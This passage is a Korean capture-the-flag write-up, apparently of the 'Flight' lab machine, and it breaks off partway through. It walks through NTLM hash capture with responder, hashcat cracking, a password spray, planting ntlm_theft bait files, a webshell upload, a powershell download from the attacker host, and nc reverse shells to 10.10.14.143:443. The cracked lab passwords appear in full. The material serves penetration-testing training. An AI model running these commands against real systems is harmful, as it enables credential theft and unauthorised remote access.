1. 정찰
1.1. nmap
정찰 결과 AD 환경임을 알 수 있고 80포트 서비스로 보아 웹페이지가 서비스 되는 것을 알 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nmap -sC -sV 10.129.228.120
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-22 08:39 +04
Nmap scan report for 10.129.228.120
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-22 11:39:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-12-22T11:39:58
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.55 seconds
1.2. 실패 - rpcclient / smbmap / smbclient
기본적인 정보수집을 위해 공유폴더 등을 탐색하려 했으나 걸리는 것은 아무것도 없었다. 그리하여 공격 벡터가 웹페이지 밖에 남지 않음을 알 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# smbmap -H 10.129.228.120
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.228.120, no fun for you...
[*] Closed 1 connections
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# smbclient -N -L //10.129.228.120
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.120 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# rpcclient -U ""%"" 10.129.228.120
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
1.3. 웹 정찰
마땅히 할 수 있는 것이 없고, 웹 페이지에도 특별한 내용이 없다. 따라서 ffuf 를 이용해서 서브도메인을 검색했다. school 이라는 서브 도메인을 확보했다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# ffuf -u http://flight.htb -H "Host: FUZZ.flight.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 7069
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://flight.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.flight.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 7069
________________________________________________
school [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 210ms]
:: Progress: [4989/4989] :: Job [1/1] :: 169 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
2. 크리덴셜 확보
2.1. 공유 폴더 설정
school.flight.htb 에 접속하면 view 파라미터를 통해 home.html 이나 about.html 등을 접속하는 모습을 확인할 수 있다. 다른 파일들을 보기에는 정확히 어떤 경로가 존재하는지 모르겠고, 의심스러운 경로라고 에러가 나오기 때문에 나의 kali 에서 공유폴더를 만들고 그 쪽으로 접근하게 만들었다.
때마침 ldap 서비스를 하고 있었으므로 responder 를 통해서 공유 폴더쪽으로 접근하게 만들었더니 NTLM 해쉬를 받을 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[...SNIP...]
[SMB] NTLMv2-SSP Client : 10.129.228.120
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:15aa7b110803f00a:C3AA6BA688552E57A16999789A57EF1C:010100000000000000F3C08B2373DC013560A00C04B95BBF00000000020008004500500034004B0001001E00570049004E002D005200510051005700520053005000580048003000470004003400570049004E002D00520051005100570052005300500058004800300047002E004500500034004B002E004C004F00430041004C00030014004500500034004B002E004C004F00430041004C00050014004500500034004B002E004C004F00430041004C000700080000F3C08B2373DC0106000400020000000800300030000000000000000000000000300000A3518CA9C8C6D3E36886ED27F3DC2A4E5273E31F6322EF6C44444C443AB420320A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340033000000000000000000
2.2. NTLM 해쉬 복호화
hashcat 을 통해서 복호화 할 때는 5600번을 통해서 복호화를 진행했고, S@Ss!K@*t13 라는 비밀번호를 습득할 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
[...SNIP...]
SVC_APACHE::flight:15aa7b110803f00a:c3aa6ba688552e57a16999789a57ef1c:010100000000000000f3c08b2373dc013560a00c04b95bbf00000000020008004500500034004b0001001e00570049004e002d005200510051005700520053005000580048003000470004003400570049004e002d00520051005100570052005300500058004800300047002e004500500034004b002e004c004f00430041004c00030014004500500034004b002e004c004f00430041004c00050014004500500034004b002e004c004f00430041004c000700080000f3c08b2373dc0106000400020000000800300030000000000000000000000000300000a3518ca9c8c6d3e36886ed27f3dc2a4e5273e31f6322ef6c44444c443ab420320a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100340033000000000000000000:S@Ss!K@*t13
[...SNIP...]
2.3. 유저 정보 추출
하나의 계정을 알아 냈으므로 해당 계정을 가지고 다른 계정들의 정보를 수집할 수 있을 것이라고 기대한다. nxc 를 이용해서 smb 에서 --users 를 이용해서 다른 계정의 정보를 수집할 수도 있고, ldap 을 통해서도 계정 정보를 수집할 수 있다. 이 정보들을 users 파일에다가 넣어서 다른 공격을 진행할 것이다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nxc smb 10.129.228.120 -u svc_apache -p 'S@Ss!K@*t13' --users
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.120 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.228.120 445 G0 Administrator 2022-09-22 20:17:02 0 Built-in account for administering the computer/domain
SMB 10.129.228.120 445 G0 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.228.120 445 G0 krbtgt 2022-09-22 19:48:01 0 Key Distribution Center Service Account
SMB 10.129.228.120 445 G0 S.Moon 2022-09-22 20:08:22 0 Junion Web Developer
SMB 10.129.228.120 445 G0 R.Cold 2022-09-22 20:08:22 0 HR Assistant
SMB 10.129.228.120 445 G0 G.Lors 2022-09-22 20:08:22 0 Sales manager
SMB 10.129.228.120 445 G0 L.Kein 2022-09-22 20:08:22 0 Penetration tester
SMB 10.129.228.120 445 G0 M.Gold 2022-09-22 20:08:22 0 Sysadmin
SMB 10.129.228.120 445 G0 C.Bum 2022-09-22 20:08:22 0 Senior Web Developer
SMB 10.129.228.120 445 G0 W.Walker 2022-09-22 20:08:22 0 Payroll officer
SMB 10.129.228.120 445 G0 I.Francis 2022-09-22 20:08:22 0 Nobody knows why he's here
SMB 10.129.228.120 445 G0 D.Truff 2022-09-22 20:08:22 0 Project Manager
SMB 10.129.228.120 445 G0 V.Stevens 2022-09-22 20:08:22 0 Secretary
SMB 10.129.228.120 445 G0 svc_apache 2022-09-22 20:08:23 0 Service Apache web
SMB 10.129.228.120 445 G0 O.Possum 2022-09-22 20:08:23 0 Helpdesk
SMB 10.129.228.120 445 G0 [*] Enumerated 15 local users: flight
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nxc ldap 10.129.228.120 -u svc_apache -p 'S@Ss!K@*t13' --users
LDAP 10.129.228.120 389 G0 [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
LDAP 10.129.228.120 389 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
LDAP 10.129.228.120 389 G0 [*] Enumerated 15 domain users: flight.htb
LDAP 10.129.228.120 389 G0 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.228.120 389 G0 Administrator 2022-09-23 00:17:02 0 Built-in account for administering the computer/domain
LDAP 10.129.228.120 389 G0 Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.228.120 389 G0 krbtgt 2022-09-22 23:48:01 0 Key Distribution Center Service Account
LDAP 10.129.228.120 389 G0 S.Moon 2022-09-23 00:08:22 0 Junion Web Developer
LDAP 10.129.228.120 389 G0 R.Cold 2022-09-23 00:08:22 0 HR Assistant
LDAP 10.129.228.120 389 G0 G.Lors 2022-09-23 00:08:22 0 Sales manager
LDAP 10.129.228.120 389 G0 L.Kein 2022-09-23 00:08:22 0 Penetration tester
LDAP 10.129.228.120 389 G0 M.Gold 2022-09-23 00:08:22 0 Sysadmin
LDAP 10.129.228.120 389 G0 C.Bum 2022-09-23 00:08:22 0 Senior Web Developer
LDAP 10.129.228.120 389 G0 W.Walker 2022-09-23 00:08:22 0 Payroll officer
LDAP 10.129.228.120 389 G0 I.Francis 2022-09-23 00:08:22 0 Nobody knows why he's here
LDAP 10.129.228.120 389 G0 D.Truff 2022-09-23 00:08:22 0 Project Manager
LDAP 10.129.228.120 389 G0 V.Stevens 2022-09-23 00:08:22 0 Secretary
LDAP 10.129.228.120 389 G0 svc_apache 2022-09-23 00:08:23 0 Service Apache web
LDAP 10.129.228.120 389 G0 O.Possum 2022-09-23 00:08:23 0 Helpdesk
2.4. Password Spray 공격
비밀번호만 같고 각기 다른 계정 ID를 습득했으므로 이걸 바탕으로 다른 계정에 로그인이 되는지를 확인했다. 여기서 s.moon 이라는 계정에 접속이 성공하는 것을 확인했다. 혹시나 싶어서 ID/PW가 같은 계정이 있는지 확인했지만 그건 나오지 않았다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nxc smb 10.129.228.120 -u users -p 'S@Ss!K@*t13' --continue-on-success
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.120 445 G0 [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\krbtgt:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
2.5. s.moon 계정 공유 폴더 확인
해당 계정을 통해 smb 의 공유폴더를 식별 결과 Shared 에서 읽기 및 쓰기에 해당하는 권한이 존재하는 것을 확인할 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nxc smb 10.129.228.120 -u s.moon -p 'S@Ss!K@*t13' --shares
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.120 445 G0 [+] flight.htb\s.moon:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 [*] Enumerated shares
SMB 10.129.228.120 445 G0 Share Permissions Remark
SMB 10.129.228.120 445 G0 ----- ----------- ------
SMB 10.129.228.120 445 G0 ADMIN$ Remote Admin
SMB 10.129.228.120 445 G0 C$ Default share
SMB 10.129.228.120 445 G0 IPC$ READ Remote IPC
SMB 10.129.228.120 445 G0 NETLOGON READ Logon server share
SMB 10.129.228.120 445 G0 Shared READ,WRITE
SMB 10.129.228.120 445 G0 SYSVOL READ Logon server share
SMB 10.129.228.120 445 G0 Users READ
SMB 10.129.228.120 445 G0 Web READ
2.6. ntlm_theft 를 통한 정보 수집
2.6.1. 파일 생성
ntlm_theft 에 관한 내용은 별도의 문서를 참조한다.
악성 파일을 만들어 놓고 smb 로 업로드를 할 것이다. 그러면 악성파일을 건드렸을 때, 수신 받을 내 kali IP를 설정하고 파일들을 생성한다.
┌──(root㉿kali)-[/home/…/labs/Flight/Flight-2/ntlm_theft]
└─# python ntlm_theft.py -g all -s 10.10.14.143 -f flight
/home/kali/labs/Flight/Flight-2/ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: flight/flight.scf (BROWSE TO FOLDER)
Created: flight/flight-(url).url (BROWSE TO FOLDER)
Created: flight/flight-(icon).url (BROWSE TO FOLDER)
Created: flight/flight.lnk (BROWSE TO FOLDER)
Created: flight/flight.rtf (OPEN)
Created: flight/flight-(stylesheet).xml (OPEN)
Created: flight/flight-(fulldocx).xml (OPEN)
Created: flight/flight.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: flight/flight-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: flight/flight-(includepicture).docx (OPEN)
Created: flight/flight-(remotetemplate).docx (OPEN)
Created: flight/flight-(frameset).docx (OPEN)
Created: flight/flight-(externalcell).xlsx (OPEN)
Created: flight/flight.wax (OPEN)
Created: flight/flight.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: flight/flight.asx (OPEN)
Created: flight/flight.jnlp (OPEN)
Created: flight/flight.application (DOWNLOAD AND OPEN)
Created: flight/flight.pdf (OPEN AND ALLOW)
Created: flight/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: flight/flight.library-ms (BROWSE TO FOLDER)
Created: flight/Autorun.inf (BROWSE TO FOLDER)
Created: flight/desktop.ini (BROWSE TO FOLDER)
Created: flight/flight.theme (THEME TO INSTALL
Generation Complete.
2.6.2. 생성된 파일 확인
┌──(root㉿kali)-[/home/…/labs/Flight/Flight-2/ntlm_theft]
└─# cd flight
┌──(root㉿kali)-[/home/…/Flight/Flight-2/ntlm_theft/flight]
└─# ls
Autorun.inf 'flight-(externalcell).xlsx' flight.htm flight.library-ms 'flight-(remotetemplate).docx' flight.theme
desktop.ini 'flight-(frameset).docx' 'flight-(icon).url' flight.lnk flight.rtf 'flight-(url).url'
flight.application 'flight-(fulldocx).xml' 'flight-(includepicture).docx' flight.m3u flight.scf flight.wax
flight.asx 'flight-(handler).htm' flight.jnlp flight.pdf 'flight-(stylesheet).xml' zoom-attack-instructions.txt
2.6.3. smbclient 를 통한 업로드
┌──(root㉿kali)-[/home/…/Flight/Flight-2/ntlm_theft/flight]
└─# smbclient //10.129.228.120/Shared -U s.moon%'S@Ss!K@*t13'
Try "help" to get a list of possible commands.
smb: \> prompt false
smb: \> mput *
NT_STATUS_ACCESS_DENIED opening remote file \flight.asx
putting file flight-(fulldocx).xml as \flight-(fulldocx).xml (75.7 kb/s) (average 75.7 kb/s)
putting file flight.theme as \flight.theme (2.9 kb/s) (average 48.4 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \flight.lnk
NT_STATUS_ACCESS_DENIED opening remote file \flight-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \flight.scf
NT_STATUS_ACCESS_DENIED opening remote file \flight-(frameset).docx
NT_STATUS_ACCESS_DENIED opening remote file \flight.pdf
NT_STATUS_ACCESS_DENIED opening remote file \flight-(icon).url
NT_STATUS_ACCESS_DENIED opening remote file \flight.wax
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \flight-(externalcell).xlsx
NT_STATUS_ACCESS_DENIED opening remote file \flight-(remotetemplate).docx
putting file flight-(stylesheet).xml as \flight-(stylesheet).xml (0.3 kb/s) (average 35.3 kb/s)
putting file desktop.ini as \desktop.ini (0.1 kb/s) (average 27.8 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \flight.rtf
NT_STATUS_ACCESS_DENIED opening remote file \flight.m3u
NT_STATUS_ACCESS_DENIED opening remote file \flight.htm
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
putting file flight.jnlp as \flight.jnlp (0.3 kb/s) (average 23.0 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \flight-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \flight-(handler).htm
putting file flight.application as \flight.application (2.9 kb/s) (average 20.0 kb/s)
putting file flight.library-ms as \flight.library-ms (2.1 kb/s) (average 17.6 kb/s)
smb: \>
2.6.4. responder 를 통한 NTLM 수신
┌──(root㉿kali)-[/home/kali]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[...SNIP...]
[SMB] NTLMv2-SSP Client : 10.129.228.120
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:a58779842e69f28b:8B5309D078EC11FDCF508D399A38E26A:010100000000000080FBB73A3173DC01775619EC463E385E0000000002000800330056004200440001001E00570049004E002D0057004B0043005600560057004D004E0041005800390004003400570049004E002D0057004B0043005600560057004D004E004100580039002E0033005600420044002E004C004F00430041004C000300140033005600420044002E004C004F00430041004C000500140033005600420044002E004C004F00430041004C000700080080FBB73A3173DC0106000400020000000800300030000000000000000000000000300000A3518CA9C8C6D3E36886ED27F3DC2A4E5273E31F6322EF6C44444C443AB420320A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340033000000000000000000
[*] Skipping previously captured hash for flight.htb\c.bum
[...SNIP...]
2.7. hashcat 이용 c.bum PW 복호화
hashcat 이용해서 복호화 진행한다. 그리하여 비밀번호인 Tikkycoll_431012284 를 습득했다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
[...SNIP...]
C.BUM::flight.htb:a58779842e69f28b:8b5309d078ec11fdcf508d399a38e26a:010100000000000080fbb73a3173dc01775619ec463e385e0000000002000800330056004200440001001e00570049004e002d0057004b0043005600560057004d004e0041005800390004003400570049004e002d0057004b0043005600560057004d004e004100580039002e0033005600420044002e004c004f00430041004c000300140033005600420044002e004c004f00430041004c000500140033005600420044002e004c004f00430041004c000700080080fbb73a3173dc0106000400020000000800300030000000000000000000000000300000a3518ca9c8c6d3e36886ed27f3dc2a4e5273e31f6322ef6c44444c443ab420320a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100340033000000000000000000:Tikkycoll_431012284
[...SNIP...]
2.7.1. winrm 접근 실패
해당 계정을 통해서 winrm 접근 가능성을 확인해 보있으나 실패하였다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nxc winrm 10.129.228.120 -u c.bum -p Tikkycoll_431012284
WINRM 10.129.228.120 5985 G0 [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.228.120 5985 G0 [-] flight.htb\c.bum:Tikkycoll_431012284
3. 내부망 침투
3.1. c.bum 계정 smb 공유 폴더 확인
c.bum 계정을 통해서 공유 폴더를 식별할 수 있었다. 이전과는 다르게 Web 디렉토리에 대해서도 WRITE 권한이 생긴걸로 보아 해당 폴더로 접근할 것이다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nxc smb 10.129.228.120 -u c.bum -p Tikkycoll_431012284 --shares
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.120 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284
SMB 10.129.228.120 445 G0 [*] Enumerated shares
SMB 10.129.228.120 445 G0 Share Permissions Remark
SMB 10.129.228.120 445 G0 ----- ----------- ------
SMB 10.129.228.120 445 G0 ADMIN$ Remote Admin
SMB 10.129.228.120 445 G0 C$ Default share
SMB 10.129.228.120 445 G0 IPC$ READ Remote IPC
SMB 10.129.228.120 445 G0 NETLOGON READ Logon server share
SMB 10.129.228.120 445 G0 Shared READ,WRITE
SMB 10.129.228.120 445 G0 SYSVOL READ Logon server share
SMB 10.129.228.120 445 G0 Users READ
SMB 10.129.228.120 445 G0 Web READ,WRITE
3.2. Web 폴더 접근 및 웹쉘 업로드
Web 디렉토리에 접근하면 아래와 같이 flight.htb 와 school.flight.htb 두 개가 나온다. 이걸로 보아서 여기가 웹 디렉토리 경로라는 것을 알 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# smbclient //10.129.43.56/Web -U C.Bum%'Tikkycoll_431012284'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Dec 22 20:37:00 2025
.. D 0 Mon Dec 22 20:37:00 2025
flight.htb D 0 Mon Dec 22 20:37:00 2025
school.flight.htb D 0 Mon Dec 22 20:37:01 2025
5056511 blocks of size 4096. 1246824 blocks available
이 중에서 styles 폴더로 가서 웹쉘을 업로드 한다. 그냥 school.flight.htb 로 바로 접근해서 파일을 생성하면 자동으로 지워져서 정상적인 작업이 되지 않았기 때문이다. 그리고 리버스 쉘을 맺을 때 필요한 nc 파일도 업로드를 진행한다.
smb: \school.flight.htb\styles\> put shell.php
putting file shell.php as \school.flight.htb\styles\shell.php (0.1 kb/s) (average 0.1 kb/s)
smb: \school.flight.htb\styles\> put nc.exe
putting file nc.exe as \school.flight.htb\styles\nc.exe (62.0 kb/s) (average 38.8 kb/s)
정상적으로 웹쉘이 업로드 됐다면 아래와 같이 whoami 를 했을 때 누구의 권한인지를 확인할 수 있다.
3.3. 리버스 쉘
앞서 업로드한 nc 파일을 가지고 443 포트를 향해서 쉘을 맺어준다.
그러고 kali 에서는 443번 포트로 리슨하고 있으면 정상적으로 쉘을 맺은 거를 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.228.120] 62843
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\school.flight.htb\styles>whoami
whoami
flight\svc_apache
C:\xampp\htdocs\school.flight.htb\styles>
3.4. c.bum 계정의 쉘 획득
정상적으로 svc_apache 로 쉘을 획득했더라 하더라도 권한이 별로 없어서 flag 획득은 물론 다른 행위도 하기 힘들다. 그렇기 때문에 이미 크리덴셜을 알고 있는 c.bum 의 계정으로 전환을 하려고 한다.
이 때 사용하는 파일은 RunasCs 파일이다. 다른 계정으로 명령을 실행할 수 있게 해준다. 그래서 c.bum 의 계정을 통해서 리버스 쉘을 다시 맺는 작업을 실시한다.
C:\ProgramData>powershell -c wget 10.10.14.143/RunasCs.exe -outfile r.exe
powershell -c wget 10.10.14.143/RunasCs.exe -outfile r.exe
C:\ProgramData>.\r.exe C.Bum Tikkycoll_431012284 -r 10.10.14.143:443 cmd
.\r.exe C.Bum Tikkycoll_431012284 -r 10.10.14.143:443 cmd
[-] RunasCsException: WSAConnect failed with error code: 10061
나의 kali 에서 다시 443 번 포트로 listen 하고 있으면 이번에 다시 쉘이 맺어지는데, c.bum 계정의 권한을 통해서 리버스 쉘을 맺는 것이기 때문에 이번에는 whoami 를 했을 때 c.bum 으로 나오는 것을 확인할 수 있다. 그리고 여기에서 user.txt 의 flag 를 획득할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.228.120] 52620
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
flight\c.bum
C:\>cd Users\C.Bum\Desktop
cd Users\C.Bum\Desktop
C:\Users\C.Bum\Desktop>type user.txt
type user.txt
4. Lateral Movement
4.1. 서비스 중인 포트 확인
내부에 들어와서 마땅히 할 것이 없으므로 어떤 포트로 어떤 서비스가 제공중인지에 대해서 확인한다. 그 중에서 8000 번 포트가 눈에 띈다. 통상 해당 포트는 무언가 개발할 때 많이 사용하고, 특정 용도가 정해져있지 않으므로 체크해볼 필요가 있다.
C:\>netstat -ano | findstr LISTENING
netstat -ano | findstr LISTENING
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4832
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4832
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 664
